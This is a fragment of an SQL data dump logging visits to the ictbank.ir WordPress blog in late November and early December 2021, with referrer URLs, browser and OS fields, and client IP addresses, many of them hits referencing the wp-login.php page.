(16345,'2021-11-28','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.9.73.231','000',0,2,0),
(16346,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.223.21.131','000',0,1,0),
(16347,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.19.232.29','000',0,1,0),
(16348,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.17.14.211','000',0,1,0),
(16349,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.81.204','000',0,1,0),
(16350,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.117.17','000',0,1,0),
(16351,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.17.207.74','000',0,1,0),
(16352,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.131.157.156','000',0,1,0),
(16353,'2021-11-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.44.57','000',0,1,0),
(16354,'2021-11-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.8','000',0,1,0),
(16355,'2021-11-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.169.62','000',0,1,0),
(16356,'2021-11-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.141.127','000',0,1,0),
(16357,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.234.221','000',0,1,0),
(16358,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.224.93.5','000',0,1,0),
(16359,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.204.253','000',0,1,0),
(16360,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.80.160','000',0,1,0),
(16361,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.219.15.87','000',0,1,0),
(16362,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.19.241.244','000',0,1,0),
(16363,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.132.81','000',0,1,0),
(16364,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.134.244.47','000',0,1,0),
(16365,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.66.126','000',0,1,0),
(16366,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.17.70.252','000',0,1,0),
(16367,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.133.84.96','000',0,1,0),
(16368,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.136.90','000',0,1,0),
(16369,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.191.237','000',0,1,0),
(16370,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.130.22','000',0,1,0),
(16371,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.21.122.254','000',0,1,0),
(16372,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.83.225','000',0,1,0),
(16373,'2021-11-28','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.85','000',0,5,0),
(16374,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.194.140','000',0,1,0),
(16375,'2021-11-28','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.7.12','000',0,1,0),
(16376,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.39.225','000',0,1,0),
(16377,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.211.38','000',0,1,0),
(16378,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.227.126','000',0,1,0),
(16379,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.68.248','000',0,1,0),
(16380,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.76.216','000',0,1,0),
(16381,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.58.193.239','000',0,1,0),
(16382,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.223.162.231','000',0,1,0),
(16383,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.102.254','000',0,1,0),
(16384,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.17.190.132','000',0,2,0),
(16385,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.219.46.252','000',0,1,0),
(16386,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.17.55','000',0,1,0),
(16387,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.58.59.2','000',0,1,0),
(16388,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.19.244.87','000',0,1,0),
(16389,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.197.81.59','000',0,1,0),
(16390,'2021-11-29','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','52.26.138.251','000',0,1,0),
(16391,'2021-11-29','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','113.102.167.111','000',0,1,0),
(16392,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.201.249','000',0,1,0),
(16393,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.139.78.169','000',0,1,0),
(16394,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.158.76','000',0,1,0),
(16395,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.119.126.63','000',0,1,0),
(16396,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.144.11','000',0,1,0),
(16397,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.219.186.105','000',0,1,0),
(16398,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.141.239','000',0,1,0),
(16399,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.145.50','000',0,1,0),
(16400,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.140.243.243','000',0,1,0),
(16401,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.138.111.123','000',0,2,0),
(16402,'2021-11-29','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.103.199.199','000',0,1,0),
(16403,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.199.8','000',0,1,0),
(16404,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.21.122.254','000',0,1,0),
(16405,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.129.5.120','000',0,1,0),
(16406,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.141.104.227','000',0,1,0),
(16407,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.221.6.118','000',0,1,0),
(16408,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.135.249.217','000',0,1,0),
(16409,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.129.87.98','000',0,1,0),
(16410,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.129.6.235','000',0,1,0),
(16411,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.143.228.113','000',0,1,0),
(16412,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.226.243','000',0,1,0),
(16413,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.29.98','000',0,1,0),
(16414,'2021-11-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.21.206.44','000',0,1,0),
(16415,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.221.174.180','000',0,1,0),
(16416,'2021-11-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','198.54.120.174','000',0,1,0),
(16417,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.153.25','000',0,1,0),
(16418,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.217.212.248','000',0,1,0),
(16419,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.143.222.117','000',0,1,0),
(16420,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.189.92','000',0,1,0),
(16421,'2021-11-29','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(16422,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.38.153','000',0,1,0),
(16423,'2021-11-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.211.55.4','000',0,2,0),
(16424,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.133.116','000',0,1,0),
(16425,'2021-11-29','http://design-arena.ir/blog','Firefox','OS X','10.12',NULL,NULL,'','91.208.197.96','000',0,2,0),
(16426,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.141.46.95','000',0,1,0),
(16427,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.255.220','000',0,1,0),
(16428,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.219.118.232','000',0,1,0),
(16429,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.173.233','000',0,1,0),
(16430,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.237.42','000',0,1,0),
(16431,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.135.204.229','000',0,1,0),
(16432,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.156.32','000',0,1,0),
(16433,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.34.226','000',0,1,0),
(16434,'2021-11-29','http://ictbank.ir/blog','Firefox Mobile','Android','11',NULL,NULL,'','5.157.51.74','000',0,4,0),
(16435,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.153.251','000',0,1,0),
(16436,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.87.52','000',0,1,0),
(16437,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.223.116.158','000',0,1,0),
(16438,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.217.208.18','000',0,1,0),
(16439,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.224.137.100','000',0,1,0),
(16440,'2021-11-29','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.145','000',0,1,0),
(16441,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.200.18','000',0,1,0),
(16442,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.17.148.157','000',0,1,0),
(16443,'2021-11-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.14.245','000',0,1,0),
(16444,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.223.171.6','000',0,1,0),
(16445,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.219.65.130','000',0,1,0),
(16446,'2021-11-29','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','87.98.251.172','000',0,1,0),
(16447,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.203.207','000',0,1,0),
(16448,'2021-11-29','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.103.199.196','000',0,1,0),
(16449,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.210.194','000',0,1,0),
(16450,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.204.253','000',0,1,0),
(16451,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.140.191.133','000',0,1,0),
(16452,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.227.151','000',0,1,0),
(16453,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.16.57.47','000',0,1,0),
(16454,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','34.238.53.7','000',0,1,0),
(16455,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.58.109.152','000',0,1,0),
(16456,'2021-11-29','https://www.google.com.lb/','Chrome','Windows','10.0',NULL,NULL,'','94.187.3.164','000',0,3,0),
(16457,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.234.102','000',0,1,0),
(16458,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.224.2.247','000',0,1,0),
(16459,'2021-11-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.220.101.133','000',0,1,0),
(16460,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.129.9.173','000',0,1,0),
(16461,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.219.156','000',0,1,0),
(16462,'2021-11-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','217.69.6.41','000',0,1,0),
(16463,'2021-11-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','68.183.12.129','000',0,1,0),
(16464,'2021-11-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','142.93.44.71','000',0,2,0),
(16465,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.208.195.242','000',0,1,0),
(16466,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.62.216','000',0,1,0),
(16467,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.59.120.67','000',0,1,0),
(16468,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.183.97','000',0,1,0),
(16469,'2021-11-29','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','41.76.172.3','000',0,2,0),
(16470,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.90.98','000',0,1,0),
(16471,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.18.213.62','000',0,1,0),
(16472,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.119.122.42','000',0,1,0),
(16473,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.58.163','000',0,1,0),
(16474,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.144.102','000',0,1,0),
(16475,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.119.100.190','000',0,1,0),
(16476,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.226.18','000',0,1,0),
(16477,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.145.54.178','000',0,1,0),
(16478,'2021-11-29','http://ictbank.ir/blog','Firefox','Unknown','Unknown',NULL,NULL,'','124.206.180.139','000',0,2,0),
(16479,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.137.158.107','000',0,1,0),
(16480,'2021-11-29','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.15.159.189','000',0,1,0),
(16481,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.217.42.169','000',0,1,0),
(16482,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.200.132','000',0,1,0),
(16483,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.141.29.216','000',0,1,0),
(16484,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.219.14.38','000',0,1,0),
(16485,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.129.194.74','000',0,1,0),
(16486,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.206.110','000',0,1,0),
(16487,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.20.238.114','000',0,2,0),
(16488,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.21.122.254','000',0,1,0),
(16489,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.223.237.213','000',0,1,0),
(16490,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.140.197.162','000',0,1,0),
(16491,'2021-11-30','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(16492,'2021-11-30','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.180.231.247','000',0,4,0),
(16493,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.12.111.130','000',0,1,0),
(16494,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.19.70.116','000',0,1,0),
(16495,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.9.75','000',0,1,0),
(16496,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.172.209','000',0,1,0),
(16497,'2021-11-30','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','52.90.104.212','000',0,2,0),
(16498,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.128.57','000',0,1,0),
(16499,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.170.105','000',0,1,0),
(16500,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.211.143','000',0,1,0),
(16501,'2021-11-30','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','103.114.158.1','000',0,3,0),
(16502,'2021-11-30','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','209.141.42.155','000',0,1,0),
(16503,'2021-11-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','209.141.51.49','000',0,1,0),
(16504,'2021-11-30','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','209.141.51.222','000',0,1,0),
(16505,'2021-11-30','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','209.141.35.128','000',0,1,0),
(16506,'2021-11-30','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','209.141.33.65','000',0,1,0),
(16507,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.213.49','000',0,2,0),
(16508,'2021-11-30','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(16509,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.18.108.207','000',0,1,0),
(16510,'2021-11-30','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','173.249.15.206','000',0,4,0),
(16511,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.17.68.119','000',0,1,0),
(16512,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.17.55','000',0,1,0),
(16513,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.226.243','000',0,1,0),
(16514,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.216.103.255','000',0,1,0),
(16515,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.118.105.8','000',0,1,0),
(16516,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.229.156','000',0,1,0),
(16517,'2021-11-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.71.233.243','000',0,2,0),
(16518,'2021-11-30','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.103.199.197','000',0,2,0),
(16519,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.11.134','000',0,1,0),
(16520,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.151.30','000',0,1,0),
(16521,'2021-11-30','design-arena.ir','Chrome','Windows','6.0',NULL,NULL,'','190.210.198.53','000',0,2,0),
(16522,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','54.208.195.242','000',0,1,0),
(16523,'2021-11-30','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.225.9','000',0,4,0),
(16524,'2021-11-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','91.215.153.40','000',0,2,0),
(16525,'2021-11-30','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','27.115.124.70','000',0,1,0),
(16526,'2021-11-30','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','27.115.124.6','000',0,1,0),
(16527,'2021-11-30','http://baidu.com/','UC Browser','Android','8.1.0',NULL,NULL,'','42.236.10.114','000',0,1,0),
(16528,'2021-11-30','http://ictbank.ir/blog','Chrome','Android','8.0',NULL,NULL,'','171.13.14.75','000',0,1,0),
(16529,'2021-11-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.197.28.28','000',0,2,0),
(16530,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.23.89.210','000',0,1,0),
(16531,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.117.190.193','000',0,1,0),
(16532,'2021-11-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.55.251','000',0,1,0),
(16533,'2021-11-30','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.103.199.115','000',0,2,0),
(16534,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.193.48','000',0,1,0),
(16535,'2021-11-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','151.239.221.94','000',0,1,0),
(16536,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.14.146.22','000',0,1,0),
(16537,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.17.13.222','000',0,1,0),
(16538,'2021-11-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.141.127','000',0,2,0),
(16539,'2021-11-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.232.88.121','000',0,1,0),
(16540,'2021-11-30','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(16541,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.143.253.130','000',0,1,0),
(16542,'2021-11-30','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','3.15.163.41','000',0,4,0),
(16543,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.137.206.196','000',0,1,0),
(16544,'2021-11-30','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.23.115.50','000',0,1,0),
(16545,'2021-12-01','http://ictbank.ir/blog/index.php/2020/11/03/fedora-33-problem-with-broadcom-wifi-device/','Chrome','Windows','6.2',NULL,NULL,'','46.161.11.66','000',0,8,0),
(16546,'2021-12-01','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.137','000',0,2,0),
(16547,'2021-12-01','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(16548,'2021-12-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','108.167.133.28','000',0,1,0),
(16549,'2021-12-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.101','000',0,2,0),
(16550,'2021-12-01','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','62.210.88.24','000',0,3,0),
(16551,'2021-12-01','http://82.102.9.14:80/blog','Chrome','Android','7.0',NULL,NULL,'','82.152.155.136','000',0,1,0),
(16552,'2021-12-01','http://82.102.9.14/blog/','Chrome','Android','7.0',NULL,NULL,'','208.64.8.113','000',0,1,0),
(16553,'2021-12-01','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(16554,'2021-12-01','http://ictbank.ir/','Firefox','Windows','6.3',NULL,NULL,'','176.106.246.67','000',0,1,0),
(16555,'2021-12-01','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.245.62.103','000',0,2,0),
(16556,'2021-12-01','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.103.199.197','000',0,2,0),
(16557,'2021-12-01','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(16558,'2021-12-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.166.216.145','000',0,1,0),
